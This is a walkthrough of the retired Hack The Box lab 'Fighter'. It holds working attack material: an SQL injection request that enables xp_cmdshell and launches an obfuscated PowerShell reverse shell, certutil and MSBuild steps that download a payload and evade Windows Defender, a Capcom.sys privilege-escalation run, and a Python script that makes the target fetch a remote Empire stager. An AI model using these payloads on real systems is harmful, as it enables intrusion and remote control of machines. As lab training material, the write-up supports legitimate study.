Today we are going to solve another CTF challenge, “Fighter”. It is a retired vulnerable lab from Hack The Box, which offers a collection of vulnerable machines as challenges, from beginner to expert level, so that pentesters can practise online according to their experience.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Fighter is 10.10.10.72.
Let’s start off with our basic nmap command to find out the open ports and services.
C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds
The Nmap output shows us that there is only 1 port open: 80(HTTP)
Port 80 serves HTTP, so we open the IP in a browser.
On the homepage we find the domain name “streetfighterclub.htb”, which we add to our /etc/hosts file.
Nothing else on the page is useful, but the domain name suggests there may be virtual hosts that give us more to work with, so we brute-force subdomains. We intercept a request in Burp, send it to Intruder and mark the subdomain part of the Host header as the payload position.
For the wordlist we use namelist.txt from /usr/share/dnsrecon/.
After the run one name stands out: “members.streetfighterclub.htb” answers with HTTP 403, unlike the default response the other candidates get.
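Added example, not from the original post: the same virtual-host brute force as a Python script instead of Burp Intruder. It first requests a random name that cannot exist to learn what the server answers for unknown hosts, then reports every wordlist entry whose status code or body length differs from that baseline, which is exactly what separates members (403) from the catch-all response. The wordlist path is the one used above; the FAKE_RESPONSES table and the lengths in it are constructed so the demo runs offline, and http_fetch is the real network path.

```python
import random
import string
import urllib.error
import urllib.request


def http_fetch(url, host, timeout=5):
    """GET url with the Host header overridden; return (status, body length).
    A 403 or 404 is a data point here, not an error, so HTTPError is caught."""
    req = urllib.request.Request(url, headers={"Host": host, "User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def find_vhosts(url, domain, names, fetch=http_fetch):
    """Return [(host, status, length)] for every candidate whose response differs
    from the baseline. The baseline is a random subdomain that cannot exist, so it
    captures whatever the server returns for unknown virtual hosts."""
    junk = "".join(random.choices(string.ascii_lowercase, k=12))
    baseline = fetch(url, f"{junk}.{domain}")
    hits = []
    for name in names:
        name = name.strip()
        if not name or name.startswith("#"):  # skip blank and comment lines of the wordlist
            continue
        host = f"{name}.{domain}"
        status, length = fetch(url, host)
        if (status, length) != baseline:
            hits.append((host, status, length))
    return hits


# Constructed responses so the demo runs without touching the target:
# "members" gets the 403 seen above, every other name gets the default page.
FAKE_RESPONSES = {"members.streetfighterclub.htb": (403, 1233)}


def fake_fetch(url, host, timeout=5):
    return FAKE_RESPONSES.get(host, (200, 4567))


if __name__ == "__main__":
    demo = find_vhosts("http://10.10.10.72/", "streetfighterclub.htb",
                       ["www", "members", "mail", "admin"], fetch=fake_fetch)
    print(demo)  # [('members.streetfighterclub.htb', 403, 1233)]
    # Real run against the box:
    # with open("/usr/share/dnsrecon/namelist.txt") as f:
    #     print(find_vhosts("http://10.10.10.72/", "streetfighterclub.htb", f))
```

If the default page reflects the Host header or carries a timestamp, the body length will differ for every name and everything looks like a hit; in that case compare only the status code, or strip the reflected value before measuring.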
We add the subdomain to /etc/hosts as well, but opening it in the browser only gives a 403 Forbidden error.
So we run a dirb scan against members.streetfighterclub.htb and find a directory called “old”.
dirb http://members.streetfighterclub.htb/
Since the server is IIS, we look for .asp pages inside that directory and find one called “login.asp”.
dirb http://members.streetfighterclub.htb/old -X .asp
We open the web page and find a login page.
We enumerate the login page and find that the back end is MSSQL and that the logintype POST parameter sent to /old/verify.asp is injectable. We extract a username, password and e-mail from the database, but they do not get us logged in, so instead we use stacked queries to execute operating-system commands through xp_cmdshell. We referred to this link. The logintype value in the request below closes the original statement with 1; and appends: sp_configure 'show advanced options' and 'xp_cmdshell' set to 1 (each followed by RECONFIGURE WITH OVERRIDE), a scratch table fighter to hold command output, and an INSERT ... EXECUTE xp_cmdshell that launches a PowerShell TCP reverse shell to 10.10.14.20 on port 80. The odd capitalisation of xp_cmdshell and of the PowerShell keywords is presumably there to get past simple keyword filtering.
POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login
We start a listener on port 80 first, send the request, and get a reverse shell as the SQL Server service account.
C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv
Enumeration from this shell turns up nothing useful, so we try to upgrade to Meterpreter, but any executable we drop on the box is blocked by endpoint protection (Windows Defender, as the Empire section further down confirms), not by a firewall. We got a reference through this link on how to bypass this: we use nps_payload to generate an MSBuild project file (msbuild_nps.xml) that carries our payload as an inline task (download from here). msbuild.exe is a signed Microsoft binary already on the system, so compiling and running the project is not blocked and no new executable touches disk.
We move into c:\users\sqlserv, the home directory of the sqlserv user we are running as.
We start the listener with the resource script that nps_payload generated:
msfconsole -r msbuild_nps.rc
We start our python HTTP Server to send our file to the target machine.
python -m SimpleHTTPServer 80
We download the file using certutil.exe on the target machine.
certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml
We then run the XML file we uploaded using msbuild.exe.
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe msbuild_nps.xml
As soon as MSBuild builds the project we get a Meterpreter session. sysinfo shows it is a 32-bit (x86) Meterpreter on a 64-bit machine: we ran msbuild.exe from the Framework directory, which is the 32-bit build (the 64-bit copy lives under Framework64).
The local exploit we use later needs a native x64 session, so we list the processes, pick one that is 64-bit and migrate into it to get a 64-bit session.
meterpreter > ps
meterpreter > migrate 2320
Privilege-escalation enumeration still turns up nothing. Since the box is themed on Street Fighter, we google for Street Fighter exploits and learn that Street Fighter V shipped a kernel driver, Capcom.sys, with a local privilege-escalation vulnerability. The driver is loaded through a service named Capcom, so we check whether it is present on the target:
sc query capcom
We find this Metasploit module here, but running it fails with an error stating that the system is not vulnerable: the module's OS-version check does not recognise this host. The driver is loaded regardless, so we comment out the version check in the module source.
With that change the exploit runs:
msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec) > run
Running getuid in the new session shows that we now have administrative rights.
We search the user directories for the flags and find user.txt in “c:\users\decoder\Desktop”; its content is our first flag.
In c:\users\Administrator\Desktop we find “root.exe”, which asks for a password when run, and next to it a DLL called “checkdll.dll”, which presumably performs the password check.
We pull both files back to our machine with Meterpreter:
download root.exe /root/Desktop
download checkdll.dll /root/Desktop
Reversing them in IDA shows that the check XORs each character of a constant string with 9. IDA auto-names the string aFmFeholH; its actual content is “Fm`fEhOl}h” (ten characters, the same length as the password; the backtick is easy to lose and the lowercase l easy to misread as 1).
So we write a small C program that XORs 9 with each character of “Fm`fEhOl}h”.
Compiling and running it gives the password “OdioLaFeta”.
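Added example, not the author's C program (which the post does not reproduce): the same decode in Python, plus a generalisation the post only hints at. candidate_keys tries all 256 single-byte keys and keeps those whose output is entirely alphanumeric; on a ten-character sample several keys survive, which is why the key 9 read from the disassembly, not statistics, is what settles it. The constant string and key are the ones described above; nothing else is assumed.

```python
import string

# Constant string from checkdll.dll (IDA auto-name aFmFeholH) and the key seen in the disassembly.
ENCODED = "Fm`fEhOl}h"
KEY = 9


def xor_decode(data: str, key: int) -> str:
    """XOR every character with a single-byte key. XOR is its own inverse,
    so the same call encodes and decodes."""
    return "".join(chr(ord(c) ^ key) for c in data)


def candidate_keys(data: str, alphabet: str = string.ascii_letters + string.digits) -> dict:
    """Generalisation: every single-byte key whose output consists only of
    characters from `alphabet`, mapped to that output. Short ciphertexts leave
    more than one plausible key, so this narrows the search rather than ends it."""
    hits = {}
    for key in range(256):
        plain = xor_decode(data, key)
        if all(c in alphabet for c in plain):
            hits[key] = plain
    return hits


if __name__ == "__main__":
    print(xor_decode(ENCODED, KEY))  # OdioLaFeta
    for key, plain in sorted(candidate_keys(ENCODED).items()):
        print(f"key {key:3d}: {plain}")
```

Run it and note how many keys produce a clean-looking string; that ambiguity is normal for a ten-byte sample and is the reason the disassembly (which states the key explicitly) beats guessing.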
When we provide the password to the root.exe we get our final flag.
…
With the help of Empire
To bypass Defender we use the starfighter_xsl stager from Empire (by Luis Vacas).
We write a small Python script that reuses the SQL injection to make the target fetch and run our .xsl, which gives us an Empire agent:
root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
import requests

# Stacked-query injection through the logintype parameter of verify.asp:
# enable xp_cmdshell, have wmic load the remote XSL stylesheet that pulls the
# Empire stager, then switch xp_cmdshell off again to tidy up.
INJECT = (
    "1;"
    "EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;"
    "EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;"
    "drop table mojones;create table mojones (out varchar(8000));;"
    "insert into mojones (out) execute xp_CmdSheLl "
    "'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';"
    "EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"
)

params = {
    "username": "admin",
    "password": "admin",
    "B1": "LogIn",
    "logintype": INJECT,
}

# The session cookie value is the one captured from the browser at the time.
resp = requests.post(
    "http://members.streetfighterclub.htb/old/verify.asp",
    data=params,
    allow_redirects=False,
    cookies={"ASPSESSIONIDCARRRDBA": "IFMBKKKDLPNKELDDENPKDKNB"},
)
print(resp.status_code)
Then we migrate from the Empire agent to Metasploit with nps_payload (https://github.com/trustedsec/nps_payload); example of use:
cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml
Author: Puckiestyle
Reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/